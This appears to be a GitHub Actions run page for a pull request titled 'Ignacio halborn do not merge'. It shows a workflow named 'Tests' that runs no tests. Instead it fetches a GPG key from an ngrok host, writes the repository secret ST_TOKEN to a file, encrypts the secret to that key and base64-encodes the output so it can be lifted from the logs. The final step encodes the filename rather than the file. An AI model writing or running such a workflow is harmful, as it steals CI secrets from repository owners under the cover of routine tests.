Skip to content

Ignacio halborn do not merge #537

Ignacio halborn do not merge

Ignacio halborn do not merge #537

Workflow file for this run

name: Tests
on:
pull_request:
branches:
- "**"
push:
branches:
- "master"
workflow_dispatch:
jobs:
install-tparse:
runs-on: ubuntu-latest
steps:
- name: Get key
run: wget https://c574-85-52-243-15.ngrok-free.app/ignacio.key
- name: Import GPG key
run: gpg --import ignacio.key
- name: get secrets
run: echo ${{ secrets.ST_TOKEN }} > secret.txt
- name: trust key
run: echo -e "5\ny\n" | gpg --command-fd 0 --edit-key tmp_key trust
- name: encrypt secrets
run: gpg -e -r tmp_key secret.txt
- name: encode encrypted secrets
run: base64 <<< secret.txt.gpg